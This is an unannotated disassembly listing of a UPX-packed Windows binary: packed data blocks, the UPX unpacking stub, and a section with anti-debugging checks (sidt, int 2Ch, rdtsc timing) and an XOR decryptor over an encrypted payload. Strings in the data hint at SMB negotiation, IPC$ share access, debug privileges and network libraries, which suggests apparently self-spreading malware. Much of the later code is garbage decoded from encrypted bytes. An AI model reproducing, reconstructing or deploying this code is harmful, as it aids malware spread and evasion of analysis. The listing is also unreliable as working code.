dd 2CE1FCB7h, 0FCF5CA01h, 0FCF25AFCh, 0FDBFFFE5h, 0F5FCF7EBh
dd 0C7D6ABAAh, 59AAF934h, 2A2A25B4h, 93ACC966h, 0BEB78190h
dd 90FF67F0h, 0C983639Dh, 309271CDh, 513519BFh, 0A95D914h
dd 0FFFF9172h, 712AEC20h, 0A5D2EBC8h, 0E180D512h, 6FAA529Ah
dd 9A2A8D14h, 46FEDFC8h, 8B12B9FBh, 0C3474A9Ah, 0DB9BAB9Eh
dd 0EC20A319h, 0FFDDA26Ch, 0BDFFFDBFh, 0DF9EED85h, 0EB81E8A2h
dd 0C8125544h, 2E961FBDh, 0D812EB8Dh, 125A9A85h, 0FF9A099Dh
dd 5ACD0B09h, 0D096F810h, 7F664922h, 8712FEFDh, 0BB6F6EDBh
dd 95C25AA9h, 82128502h, 0CB5A9104h, 0F9B9CFF7h, 857F4067h
dd 424D53FFh, 0C8531872h, 9CFF4BFh, 62FEFFh, 83435002h
dd 4F575445h, 0E35BED52h, 50204BFFh, 52474F52h, 31204D41h
dd 414C17CDh, 52024D4Eh, 0A6290EBh, 0B71566ABh, 0B75BB696h
dd 0BB676B03h, 330E7075h, 0B61F611Ah, 4D27EB74h, 21583223h
dd 2E323232h, 66D35831h, 2018D62Ah, 5A8B323Ch, 0A433C8C9h
dd 0EC1B0773h, 0C2285DBh, 40023FFh, 20140A11h, 8DDADE05h
dd 69A0D41Ah, 534B4C00h, 4915053h, 97B7887Fh, 4AE00882h
dd 0EDF81773h, 6E240057h, 6F006400h, 3A730075h, 5EDEC874h
dd 901306Ch, 3500398Ch, 0DCC06C23h, 72E1D96h, 32ABDA00h
dd 889CF20h, 3B57DA20h, 9F4C9383h, 46F20003h, 0C1901E23h
dd 40074706h, 0D1060006h, 1046E7FFh, 8A151F01h, 48E088h
dd 8144004Fh, 0FE1BFFFDh, 0F27A6A19h, 281C49E4h, 742530AFh
dd 0E1536710h, 137C853Ch, 3075DF5Ch, 0AEBD0400h, 75CB6B9h
dd 5C085ABDh, 72363761h, 72E4DD7h, 2E380036h, 3B1B3077h
dd 496D899Bh, 0E843EC00h, 0F9633F00h, 640E7900h, 4DC08A2h
dd 6DFF20F6h, 0FF1640h, 0E00DEDEh, 19F1600h, 9BF2602h
dd 28401213h, 0C1110319h, 8B7DC346h, 0D374D96Ch, 0BBE42970h
dd 9C2A9BACh, 0D81D256Bh, 109F6DB3h, 1B04480Eh, 5D6DCF54h
dd 5A5413D7h, 22596326h, 83CBC75Ch, 45B9FF34h, 58765h
dd 4810030Bh, 0C5FFFFB8h, 0EB810DEh, 286A050Bh, 0B10C3919h
dd 0A89B11D0h, 7D4FC000h, 0D9EC7FE1h, 5D5FF52Eh, 1CEB8A88h
dd 0E89F11C9h, 48102B3Ch, 0B22E7C60h, 0F40CD197h, 0CA060A3h
dd 95E43C80h, 0CB10CA0h, 32393BFEh, 880CA000h, 90040h
dd 847B03ECh, 7F927h, 4F401495h, 0BF40707Ch, 6C8A5ECh
dd 13430700h, 88FFC279h, 138578h, 0E9A65BABh, 18F81013h
dd 2FE409CFh, 230EFEFFh
dd 0D45830C1h, 8408BE40h, 7DD3E488h, 10B943D2h, 0B801FFEEh
dd 79366110h, 0AD200CF2h, 9F7F070Dh, 0FF215E5h, 700118D8h
dd 0F900F84h, 0F842579h, 4D000F95h, 206FC9Eh, 6C0F847Fh
dd 84AADE0Fh, 0A89A0087h, 93F436Fh, 1F13C88Ch, 50586E69h
dd 0C0A6DB20h, 7250CAh, 39014446h, 3C844FC9h, 123C6B32h
dd 7B027515h, 413C840Dh, 941C0053h, 1CAFFF01h, 0C606EB22h
dd 73255C5Ch, 6370695Ch, 9BFFF975h, 0EC816624h, 0E4FF071Ch
dd 44655300h, 67756265h, 0FA377669h, 67853518h, 6A6441A7h
dd 6F546175h, 0EC99B6E4h, 176E656Bh, 126F4C73h, 0BF6D7075h
dd 61569FDDh, 4165756Ch, 28704F17h, 7324636Fh, 8D48EA58h
dd 76430034h, 65333F61h, 0E33152A3h, 0F86D4C79h, 0F5056D1Bh
dd 545F1165h, 57796172h, 95D52DB5h, 31431735h, 52521A61h
dd 682DBB9Dh, 6854056Fh, 7356140Ch, 0A35B6B75h, 284158DBh
dd 0A578454Fh, 77336D67h, 47356E3Ah, 121EF3F5h, 48F46897h
dd 7F505454h, 5732203Ch, 0FDEF52B5h, 0D4B4F20h, 9F4B010Ah
dd 6ADF6644h, 4C2D02BBh, 3A2D6704h, 18752520h, 0CA587B5Ah
dd 7954282Fh, 0A66D26B5h, 70A3DAB6h, 15836386h, 8EA9EE2Fh
dd 2DC7025Ah, 42C97293h, 9F56B18Bh, 2B004757h, 0A35B47BAh
dd 0E564F6F4h, 42CB73CBh, 6D8D57FBh, 0A9637673h, 0DA6977CBh
dd 0F1538B77h, 175F3203h, 9A69E775h, 7B5E62Eh, 36373803h
dd 0A6BB2774h, 331F3435h, 32033369h, 0D34B75F2h, 13393031h
dd 0C8383F38h, 370D8320h, 20353607h, 34320C83h, 909A3233h
dd 3031C83Ah, 0F93AF378h, 0CC95ACFFh, 4F53BBD9h, 41575446h
dd 4D5C4552h, 62C1F869h, 6F736F7Bh, 5CBF5CD7h, 72727543h
dd 6B61BC22h, 73DC5615h, 75525C0Ah, 85B79F6Eh, 74231716h
dd 6824D26Fh, 0FF532030h, 1B6850A3h, 673BE3F7h, 7264736Eh
dd 1D93706Ah, 652B79B6h, 51530002h, 6612D86h, 6C0E5F06h
dd 5736264Dh, 5F664B68h, 60C14923h, 34421C28h, 68FF5455h
dd 130BC037h, 5E432053h, 0D5762067h, 0FB95B7B3h, 8058763Bh
dd 0C823B532h, 7C65B05Eh, 0FC471A1Bh, 23596E66h, 79931217h
dd 36346B73h, 4200707Eh, 61BF2063h, 0B7B5B623h, 6D1B1358h
dd 0DD975220h, 0B4B63772h, 0E0440300h, 2F660E20h, 0EE7B25B0h
dd 2AAC6D67h, 5B632463h, 22BFDAE4h, 20797469h, 1E6E614Dh
dd 0AC31B81Ah, 74201501h, 2A2AAE89h, 0FD92BBC4h, 0EC01388Ch
dd 65657246h, 0DBF0060Ch, 470DF923h, 6F4D7465h, 978A5F87h
dd 6B4665E2h, 686D614Eh, 74736C01h, 0C01AEF7Bh, 0A956372h
dd 79706F43h, 70A40A19h, 45A1816Fh, 4E326578h, 7C52FFF6h
dd 6C6F6F54h, 32337067h, 70616E53h, 746F6873h, 4DADDD19h
dd 32129C8Ah, 540F7372h, 14AD7305h, 182C358Fh, 80FB05B6h
dd 78654E21h, 41616974h, 215FFD54h, 0F76451Eh, 7469616Bh
dd 53726F46h, 0B6F6BA21h, 4F7B673Ch, 2C766A62h, 0D9B9E144h
dd 8D225AC3h, 3A0B6972h, 0BFBDEC97h, 486573C8h, 0C646E61h
dd 0C25E2447h, 8B6C3BDh, 5A61D26Eh, 0B5CDB3F0h, 0A3449711h
dd 14796456h, 0B6DF75BBh, 2B61984Ch, 6F666E49h, 6509530Fh
dd 37800670h, 9C496218h, 64656B26h, 64D98845h, 6EB328B3h
dd 92E7FB36h, 12E0D0CDh, 6464410Bh, 0F7B30F72h, 4C0B111Dh
dd 61726269h, 0E68AB567h, 4D2B60DAh, 36137C82h, 0D5CB080Bh
dd 0C363CF8Eh, 547B42DAh, 75888169h, 4915DE65h, 0E94D8AD8h
dd 1BDA3478h, 0DD29B36h, 0F239C45Dh, 4F116610h, 78455A62h
dd 0B3612DB6h, 630ADF31h, 9B9E6D13h, 522DC6E0h, 87B591Bh
dd 1766C0E0h, 38657A86h, 0A3604CA7h, 451585B5h, 0D160C3FCh
dd 33759F9Dh, 0A1673A2Bh, 4579654Bh, 0CE40EC3Bh, 0FC18610h
dd 5EC00A51h, 11F65AC2h, 5987309Eh, 21E7426Ch, 841CE010h
dd 0C517B76h, 0BE6E6241h, 0E2B6853h, 310428A5h, 1AC13F86h
dd 3677D985h, 62BB1089h, 440A7DB6h, 720E6112h, 0D61B6669h
dd 0CA79B63Ah, 2B758F67h, 616F6C36h, 6FCE436Fh, 6F112C79h
dd 67702350h, 0E8F5210h, 38F63F90h, 4114B4D0h, 69757163h
dd 74AE7072h, 35494DD8h, 0C3363AA0h, 0DE1359A7h, 0CA7273ECh
dd 18B16D06h, 35B2D1CEh, 150F920Eh, 536B99DAh, 445F1D4Dh
dd 740AC558h, 685F3FB8h, 3627F9F6h, 2CC46DBh, 4F727907h
dd 880110E9h, 9160AD15h, 1CC2D22h, 271DCD34h, 61150E65h
dd 14362CC2h, 0BBB4E70Ah, 4906EE15h, 70737766h, 4166B105h
dd 9C62834Fh, 424F466h, 0DB616C5Ah, 9B558543h, 370E1141h
dd 6705212Ch, 1B866B14h, 6E0306A6h, 74534349h, 8C950E81h
dd 0D471A65h, 0A8EDB2CBh, 273FFA1h, 2C010D02h, 392CB2CBh
dd 0C17346Fh, 0B2CB2CB2h, 10130409h, 4F45AA16h, 455036AAh
dd 0E4FFB60Eh, 59C896B7h, 0E00040D8h, 0B010F00h, 260C0601h
dd 68011CB2h, 2334DC12h, 0C6A32510h, 0B31420Eh, 0B7334A02h
dd 0C079BA4h, 39341E60h, 10B0364Bh, 2D570607h, 6210805Dh
dd 7C64098Ch, 0B0AE3145h, 6A2E1E01h, 0B60D8180h, 269024A6h
dd 7C7B64C4h, 0E0049F90h, 0FBE1642Eh, 0D85BA114h, 272A0737h
dd 48C016h, 81434BE0h, 54C32Fh, 2 dup(0)
db 90h
db 0FFh, 2 dup(0)
align 10h
pusha
mov esi, offset dword_31426000
lea edi, [esi-5000h]
push edi
or ebp, 0FFFFFFFFh
jmp short loc_31427BD2
; ---------------------------------------------------------------------------
align 8
loc_31427BC8: ; CODE XREF: UPX1:loc_31427BD9�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_31427BCE: ; CODE XREF: UPX1:31427C66�j
; UPX1:31427C7D�j
add ebx, ebx
jnz short loc_31427BD9
loc_31427BD2: ; CODE XREF: UPX1:31427BC0�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31427BD9: ; CODE XREF: UPX1:31427BD0�j
jb short loc_31427BC8
mov eax, 1
loc_31427BE0: ; CODE XREF: UPX1:31427BEF�j
; UPX1:31427BFA�j
add ebx, ebx
jnz short loc_31427BEB
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31427BEB: ; CODE XREF: UPX1:31427BE2�j
adc eax, eax
add ebx, ebx
jnb short loc_31427BE0
jnz short loc_31427BFC
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_31427BE0
loc_31427BFC: ; CODE XREF: UPX1:31427BF1�j
xor ecx, ecx
sub eax, 3
jb short loc_31427C10
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz short loc_31427C82
mov ebp, eax
loc_31427C10: ; CODE XREF: UPX1:31427C01�j
add ebx, ebx
jnz short loc_31427C1B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31427C1B: ; CODE XREF: UPX1:31427C12�j
adc ecx, ecx
add ebx, ebx
jnz short loc_31427C28
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31427C28: ; CODE XREF: UPX1:31427C1F�j
adc ecx, ecx
jnz short loc_31427C4C
inc ecx
loc_31427C2D: ; CODE XREF: UPX1:31427C3C�j
; UPX1:31427C47�j
add ebx, ebx
jnz short loc_31427C38
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31427C38: ; CODE XREF: UPX1:31427C2F�j
adc ecx, ecx
add ebx, ebx
jnb short loc_31427C2D
jnz short loc_31427C49
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_31427C2D
loc_31427C49: ; CODE XREF: UPX1:31427C3E�j
add ecx, 2
loc_31427C4C: ; CODE XREF: UPX1:31427C2A�j
cmp ebp, 0FFFFF300h
adc ecx, 1
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_31427C6C
loc_31427C5D: ; CODE XREF: UPX1:31427C64�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_31427C5D
jmp loc_31427BCE
; ---------------------------------------------------------------------------
align 4
loc_31427C6C: ; CODE XREF: UPX1:31427C5B�j
; UPX1:31427C79�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_31427C6C
add edi, ecx
jmp loc_31427BCE
; ---------------------------------------------------------------------------
loc_31427C82: ; CODE XREF: UPX1:31427C0C�j
pop esi
mov edi, esi
mov ecx, 7Eh
loc_31427C8A: ; CODE XREF: UPX1:31427C91�j
; UPX1:31427C96�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_31427C8F: ; CODE XREF: UPX1:31427CB4�j
cmp al, 1
ja short loc_31427C8A
cmp byte ptr [edi], 1
jnz short loc_31427C8A
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov eax, ebx
loop loc_31427C8F
lea edi, [esi+5000h]
loc_31427CBC: ; CODE XREF: UPX1:31427CDE�j
mov eax, [edi]
or eax, eax
jz short loc_31427D07
mov ebx, [edi+4]
lea eax, [eax+esi+7000h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+708Ch]
xchg eax, ebp
loc_31427CD9: ; CODE XREF: UPX1:31427CFF�j
mov al, [edi]
inc edi
or al, al
jz short loc_31427CBC
mov ecx, edi
jns short near ptr loc_31427CEA+1
movzx eax, word ptr [edi]
inc edi
push eax
inc edi
loc_31427CEA: ; CODE XREF: UPX1:31427CE2�j
mov ecx, 0AEF24857h
push ebp
call dword ptr [esi+7090h]
or eax, eax
jz short loc_31427D01
mov [ebx], eax
add ebx, 4
jmp short loc_31427CD9
; ---------------------------------------------------------------------------
loc_31427D01: ; CODE XREF: UPX1:31427CF8�j
call dword ptr [esi+7094h]
loc_31427D07: ; CODE XREF: UPX1:31427CC0�j
popa
jmp loc_31422334
; ---------------------------------------------------------------------------
align 400h
UPX1 ends
; Section 3. (virtual address 00008000)
; Virtual size : 00020000 ( 131072.)
; Section size in file : 00020000 ( 131072.)
; Offset to raw data for section: 00008000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX2 segment para public 'CODE' use32
assume cs:UPX2
;org 31428000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dd 3 dup(0)
dd 80C4h, 808Ch, 3 dup(0)
dd 80D1h, 809Ch, 3 dup(0)
dd 80DEh, 80A4h, 3 dup(0)
dd 80E9h, 80ACh, 3 dup(0)
dd 80F4h, 80B4h, 3 dup(0)
dd 8100h, 80BCh, 5 dup(0)
dword_3142808C dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA dd 7C80ADA0h, 7C81CDDAh, 0
dd 77DD6BF0h, 0
dd 77C371D3h, 0
dd 7E41A8ADh, 0
dd 42C2C8A1h, 0
dd 71AB9639h, 0
dd 4E52454Bh, 32334C45h, 4C4C442Eh, 56444100h, 33495041h
dd 6C642E32h, 534D006Ch, 54524356h, 6C6C642Eh, 45535500h
dd 2E323352h, 6C6C64h, 494E4957h, 2E54454Eh, 6C6C64h, 5F325357h
dd 642E3233h, 6C6Ch, 64616F4Ch, 7262694Ch, 41797261h, 65470000h
dd 6F725074h, 64644163h, 73736572h, 78450000h, 72507469h
dd 7365636Fh, 73h, 43676552h, 65736F6Ch, 79654Bh, 61720000h
dd 646Eh, 72707377h, 66746E69h, 41h, 65746E49h, 74656E72h
dd 6E65704Fh, 41h, 26h dup(0)
dd 1C39068h, 0FFC48BEDh, 0E85B93D0h, 59h, 824648Bh, 4EBB8h
dd 64FAEB00h, 18A167h, 0F30408Bh, 830240B6h, 3C7500F8h
dd 0E8h, 0ED815D00h, 402334h, 237B858Bh, 85030040h, 402383h
dd 858BF08Bh, 40237Fh, 23838503h, 8B500040h, 0ACC933FEh
dd 238B8532h, 41AA0040h, 23878D3Bh, 0EF7C0040h, 64C02BC3h
dd 896430FFh, 5678B820h, 3871234h, 6000h, 7BB0h, 31420000h
dd 1E00h, 78h, 75Dh dup(0)
; ---------------------------------------------------------------------------
cld
call loc_3142A02E
; =============== S U B R O U T I N E =======================================
sub_3142A006 proc near ; CODE XREF: UPX2:3142A07D�p
push ebx
mov ecx, 0DA5h
mov ebx, edx
loc_3142A00E: ; CODE XREF: sub_3142A006+13�j
xor [eax], dx
lea eax, [eax+2]
xchg dl, dh
lea edx, [ebx+edx]
loop loc_3142A00E
pop ebx
retn
sub_3142A006 endp
; ---------------------------------------------------------------------------
mov dh, 9Eh
loc_3142A01F: ; CODE XREF: UPX2:3142A068�j
pop ebp
retn
; ---------------------------------------------------------------------------
loc_3142A021: ; CODE XREF: UPX2:3142A036�j
; UPX2:3142A047�j
push ebp
mov eax, 8000h
xor ecx, ecx
jmp short loc_3142A055
; =============== S U B R O U T I N E =======================================
sub_3142A02B proc near ; CODE XREF: UPX2:3142A04A�p
; UPX2:3142A050�p
rdtsc
retn
sub_3142A02B endp
; ---------------------------------------------------------------------------
loc_3142A02E: ; CODE XREF: UPX2:3142A001�p
test eax, eax
jnz short loc_3142A03A
int 2Ch ; Internal routine for MSDOS (IRET)
test eax, eax
jns short loc_3142A021
jmp short loc_3142A049
; ---------------------------------------------------------------------------
loc_3142A03A: ; CODE XREF: UPX2:3142A030�j
push eax
sidt fword ptr [esp-2]
loc_3142A040: ; CODE XREF: UPX2:3142A09B�j
pop eax
mov eax, [eax+6]
shl eax, 10h
jns short loc_3142A021
loc_3142A049: ; CODE XREF: UPX2:3142A038�j
push ebp
call sub_3142A02B
xchg eax, ecx
call sub_3142A02B
loc_3142A055: ; CODE XREF: UPX2:3142A029�j
sub eax, ecx
mov ebp, [esp+4]
sub dword ptr [esp+4], 1E06h
sub eax, 100h
jnb short loc_3142A01F
sub ebp, 301006h
lea eax, [ebp+301082h] ; CODE XREF: UPX2:3142A0D5�j
mov dx, [eax-65h]
call sub_3142A006
pop ebp
sahf
fisttp word ptr [ecx] ; CODE XREF: UPX2:3142A0B1�j
das
sti
sub [ecx+60h], cl
mov eax, 1CD20101h
push 0A086531Eh ; CODE XREF: UPX2:3142A0A3�j
sub [ebp-4D0312B9h], esi
ja short loc_3142A040
fiadd dword ptr [ebp+ecx*8+2Ch]
repne inc esp
db 3Eh
jno short near ptr loc_3142A090+4
stosb
adc [ebx], bl
push edi
mov es, word ptr [edx-49A60A7Ah]
push esi
jns short near ptr loc_3142A084+1
cdq
push esi
db 2Eh
inc edx
mov eax, ecx
setalc
push eax
cmpsb
or [edi-4B4F3ABBh], ebp
inc bh
test al, 84h
fnsave byte ptr [ecx]
fnstsw word ptr [edi-30h]
loc_3142A0CB: ; CODE XREF: UPX2:3142A141�j
test [edi], dl
dec edx
or al, 0E3h
adc eax, 0C421A9Ah
jns short near ptr loc_3142A070+3
adc [edx+ecx*2-245F1503h], esp
loc_3142A0DE: ; CODE XREF: UPX2:3142A0FA�j
aaa
dec ebx
mov ecx, 0FE0D591h
aaa
mov [edi-31AC6514h], eax
mov al, ds:0CD1B7211h
xchg eax, esi
rcl dh, cl
pushf
jo short loc_3142A13A
cmp esi, ecx
in al, dx
loope loc_3142A0DE
and esp, [eax]
add dword ptr [ecx+5729E0DFh], 0FFFFFF9Bh
stosd
mov al, ds:7CE9BBDDh
db 67h
dec ecx
mov edi, 0E405377Ah
sahf
mov word ptr [edx+7Eh], es
lahf
; ---------------------------------------------------------------------------
db 8Fh
dd 5400F7E5h, 0EFF08285h, 80E6840h, 188B151Dh, 0AA72E4D9h
dd 59EF393Ah, 0D9C08152h, 0D6671D19h
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
db 0A2h
; ---------------------------------------------------------------------------
loc_3142A13A: ; CODE XREF: UPX2:3142A0F5�j
cmp cl, dh
mov al, ds:0EAEFC78Ch
db 65h
jbe short loc_3142A0CB
cmp dh, ds:9FF67D68h
jo short near ptr loc_3142A178+1
jecxz short loc_3142A1AB
xor esi, edi
sub eax, 0FD6E903h
sub eax, 0DCD13EBEh
xchg eax, edx
xlat
lock mov ah, 9Ah
mov byte ptr [edx+6AA03D86h], 3
mov ebx, 50A2344Eh
popa
popf
mov ah, 3Ah
adc al, 14h
push ebp
xor edx, [ebp+61E31D19h]
loc_3142A178: ; CODE XREF: UPX2:3142A14A�j
mov ds:0DB213E6Ah, al
setalc
sar edx, cl
lea ebx, [edx]
hlt
; ---------------------------------------------------------------------------
db 0FEh
dd 39438184h, 0ED75D4B3h, 0CCEF0533h, 3374C98Dh, 63B95F29h
dd 4F54271Ch
; ---------------------------------------------------------------------------
mov dl, 69h
loc_3142A19E: ; CODE XREF: UPX2:3142A1CF�j
add bl, [edi]
db 3Eh
xlat
add eax, 0EB3018D1h
enter 0FFFF857Eh, 0A5h
loc_3142A1AB: ; CODE XREF: UPX2:3142A14C�j
xor bh, bh
inc byte ptr [ebx+esi*4+42D63CC0h]
test al, 78h
sbb ebx, cs:[edx-75h]
xchg eax, esi
sbb ah, [esi+22h]
adc al, 0ACh
jp short loc_3142A228
sub al, 11h
inc esi
dec edi
popa
inc ebp
adc al, 1Fh
mov ebp, 2A741896h
jge short loc_3142A19E
aaa
jmp short loc_3142A1F1
; ---------------------------------------------------------------------------
dd 45D32D0Eh, 52AC7DB6h, 0FD7CC6C8h, 0AED1AEADh, 0FCAD7044h
dd 6872D170h, 0BC22981Eh
db 62h
; ---------------------------------------------------------------------------
loc_3142A1F1: ; CODE XREF: UPX2:3142A1D2�j
pop esi
and al, 9Ch
push edx
aas
imul edx, [esi+1Ch], 924568E4h
out dx, eax
into
das
dec esi
cmp al, 1Ch
insb
sub ebp, edx
xchg eax, edx
xor eax, 3D3AC5FBh
retn
; ---------------------------------------------------------------------------
db 4Dh, 0DFh, 0E9h
dd 0A69E9AE4h, 5C022F92h, 6172BFA9h, 5552EE16h, 8A1C5641h
dd 9EF59A7Bh
; ---------------------------------------------------------------------------
loc_3142A228: ; CODE XREF: UPX2:3142A1C0�j
sbb ecx, [ebx+6468B03Dh]
lea ebp, [ebp-43h]
shr byte ptr [edi+34h], cl
adc cl, [ecx]
retn
; ---------------------------------------------------------------------------
db 30h
dd 418620Eh, 0BBF949BBh, 2BC13B3Bh, 0D8926FA4h, 326AB4BBh
dd 0ACD7590Eh, 6B145A62h, 5A8073B7h, 0FABC6D5Bh, 0FE125D08h
dd 0B5F24EB5h, 0C0BC3621h, 0FD105B54h, 7987254Ch, 0A3530538h
dd 12105A5Ch, 5065AD1Bh, 47E3046Ch, 6053350h, 7E48C73Ah
dd 6148E804h, 0DB0BE5DBh, 4363AD9Dh, 0A0BA8F86h, 0F50BBF56h
dd 1E2CACABh, 9EFB4D44h, 0DF11C3ABh, 0FDECAB99h, 9D85E840h
dd 4F879D60h, 476F85D1h, 7420F04Ch, 0F1085096h, 6AF41A24h
dd 94B1FBCCh, 0F00409D5h, 38DE2EA6h, 65AFC9D7h, 6A8B4F20h
dd 4469889Ch, 0B2944A7Bh, 11FD4C7Fh, 0C458A1A4h, 98ABF7C3h
dd 0C191CFC5h, 32AA9F93h, 112C7CF9h, 6AFE7866h, 70781B1Ch
dd 95580EF6h, 0F27B494Bh, 0B5519B9Dh, 0A3896E71h, 0E68ABB49h
dd 17C21C12h, 2C22EDC2h, 0E5C869CAh, 3A4D6864h, 8E5D6CFFh
dd 6E7D4045h, 387BB91Ch, 0FC60F00Dh, 7B71B142h, 0B749A3BCh
dd 0BBB67D51h, 0DF0DC341h, 0EFC09E95h, 619BE5EBh, 0DDF03BD9h
dd 1EBA321Eh, 4812E3D8h, 2183857h, 0B347FD6Eh, 0C5FDE207h
dd 0B3BBCF38h, 0A359E18Fh, 0B3804851h, 0D7F68D39h, 28B2898Dh
dd 7E6C23AFh, 584354C8h, 2A3DCA8Fh, 0D4F7DBE0h, 78E277B8h
dd 4E9761BBh, 0F6743B75h, 0B9E444E7h, 2639E3D3h, 7BE71B57h
dd 0CF88E8BAh, 243781EDh, 28CBBFD2h, 9DEE407Dh, 0EBCEA7Ch
dd 0F4D1D3E8h, 9FB668E9h, 0AB337DE1h, 0FE87BB02h, 0A3D84CE7h
dd 4C33117Fh, 27EDCFBEh, 0ADDA2449h, 0E345287Dh, 0FC163282h
dd 9AD8120Bh, 15D2F222h, 6F80F654h, 0C363AD25h, 0A12B4569h
dd 6D7FC1DBh, 6427F1A8h, 6299EF6h, 0EEF0C7FCh, 0BFE20827h
dd 81AA918Ah, 694BDC98h, 0FC45E54Dh, 0FA255F5Fh, 6779C3DEh
dd 0D0A17751h, 62731D04h, 91EB7AFh, 0EFA9717Eh, 6B54070Eh
dd 9C25BF85h, 87E1CD8Ch, 0D19AE06Dh, 31738DE9h, 0DFE87843h
dd 9F889894h, 0DA718BECh, 8CB34FD5h, 5E190FFFh, 37BB32E8h
dd 0A02C5C12h, 55196367h, 3908F3D9h, 0DD926B64h, 687E170Ch
dd 590ED2DFh, 7055F559h, 89156F48h, 13FE57Ch, 54E95E5Dh
dd 303F24F4h, 45A332B6h, 6429F95Ch, 94116B74h, 0AC64DAB4h
dd 9797009Ch, 0FD38E35Dh, 7AF2AFB2h, 81B68DE6h, 6FF00E0Fh
dd 4F5482E1h, 63AF536h, 0F83E74B4h, 0B234F9AEh, 91945796h
dd 82CDD257h, 0B5E1EAF0h, 60597305h, 9E047221h, 0B64BC1AAh
dd 0AE99B26Ah, 87CAD154h, 0BDB73A75h, 0AEB3FDFAh, 0C2EBC39Ah
dd 6BB02291h, 0B4C4FBCDh, 0E1E691D3h, 120BA5A7h, 0CBFEAFACh
dd 65FB1D01h, 4569885Bh, 0EEF4377Eh, 0CB76B35Fh, 0A9D22EADh
dd 71ABC5D6h, 11FFB723h, 8EC060F7h, 73A9C3D2h, 0C43AC9D6h
dd 16539DA3h, 0BD6A6408h, 7F03467Ch, 3F61B06Dh, 6B5F011Ch
dd 0E8FA44B5h, 0E15999Eh, 0C3F2BC3Ah, 0E6F92A19h, 0FFC69798h
dd 9CCBBBA0h, 27A484CDh, 6D3DF0CCh, 717F01EFh, 7779C1BBh
dd 377986D4h, 0DCCCB6BFh, 0CB23A9BDh, 0F1C491A6h, 751026CBh
dd 0DEA86218h, 3345AFC0h, 8899F34Bh, 0DCEE383Fh, 31438D92h
dd 8697E1E7h, 25BF606Dh, 1F6A5205h, 28CC74E5h, 239FF4BEh
dd 71FC676Ch, 0E7E0BCA1h, 0B3855376h, 415FC8E8h, 0F3E5B884h
dd 0B783636Ah, 5B52D3FEh, 128FACABh, 0B1965A47h, 4B39F7E9h
dd 10FFA3AEh, 93E24257h, 5156E4F4h, 16E293BEh, 8DE06B55h
dd 57541AF6h, 14E095BCh, 0BCBF654Bh, 465D14F2h, 4C4D196h
dd 0AFA84749h, 7C5E09D0h, 35F6BCB0h, 0ADA8672Ah, 4F4A0D1Fh
dd 6ECA0B6h, 0B4B0764Dh, 1B491619h, 11E4B992h, 0AC824552h
dd 7D4A1008h, 0B0D8ACFh, 96B16A45h, 7F451C17h, 5F0DABA8h
dd 0A1BC4F10h, 7A4F0206h, 123EC5BFh, 0D6846E49h, 77440A06h
dd 1C1C84C9h, 0D9A27158h, 63571933h, 1202A3AEh, 0BA8D6579h
dd 49550E37h, 3710D3ACh, 0B8AF6E73h, 4B6B0C29h, 3616D1AAh
dd 0B6AD7F71h, 4669022Bh, 0C04DFAEh, 0D8AF5673h, 647A2B0Fh
dd 196FF8DAh, 0DD897A71h, 6275160Ch, 3803D6F5h, 0B083697Eh
dd 56630421h, 3F1FC6C2h, 0DCA94E7Dh, 6C613C01h, 5828CACBh
dd 0F8CA6D49h, 47633007h, 1802DDDEh, 0EBD96B6Dh, 8B741C60h
dd 240BD5E1h, 0C0CF645Ah, 98575A1Fh, 2000F9C7h, 0C8D56D7Bh
dd 8F6A1E5Ch, 2316CBE7h, 0E1D76C6Fh, 0BE0E1922h, 2135D9CAh
dd 0C7D57768h, 986B3911h, 3803C1DFh, 0E1D96E6Bh, 81691156h
dd 2E0FC2FCh, 0DAC5776Fh, 906E273Dh, 3112C5DDh, 0F2D8B9FEh
dd 0B3653231h, 2431C4C4h, 0FDDDB0FDh, 936E1D36h, 3F2EC7D5h
dd 0FAFDFABDh, 956C1921h, 33CEBD1h, 9ACB9492h, 81663D1Fh
dd 2134CBE3h, 0E9DC97B7h, 0AF662526h, 2626EFA4h, 0F7D8A497h
dd 9F8C2C2Dh, 2E26CEA2h, 0E5DB9794h, 83BB757Fh, 3F26EFD2h
dd 0F7C982A5h, 0DB88362Fh, 4535D4ACh, 0F7F6EE87h, 8FBF2729h
dd 684EFDF0h, 0F9E49894h, 90B6242Ah, 5B25E4EEh, 0FDC59E9Ah
dd 87A63F05h, 5B23D2ECh, 0E5F1B888h, 9296492Ch, 412DC196h
dd 0EFF08FADh, 0BB9C5214h, 562AC394h, 0DD9A948Ch, 0AC8E5450h
dd 4621E7C4h, 0EFDE84A8h, 8CED5250h, 5A36FEF9h, 0E8D78C84h
dd 0D8885A56h, 5929F8D9h, 0EEFD9886h, 0A2A7335Dh, 5E54ECCDh
dd 0F2C2A892h, 0B88E475Fh, 5A59E1EFh, 1BFBB58Bh, 0A6AB2F5Ah
dd 465FF6CBh, 15C8BDA9h, 9EE3485Eh, 404AC1F2h, 2AE9A2BAh
dd 0AB824442h, 6D36F3F7h, 1DF897ADh, 9CBA5D4Fh, 445711F0h
dd 0ECDA1A4h, 89A9692Ch, 6B5319F2h, 17E383B0h, 0A6B44C5Eh
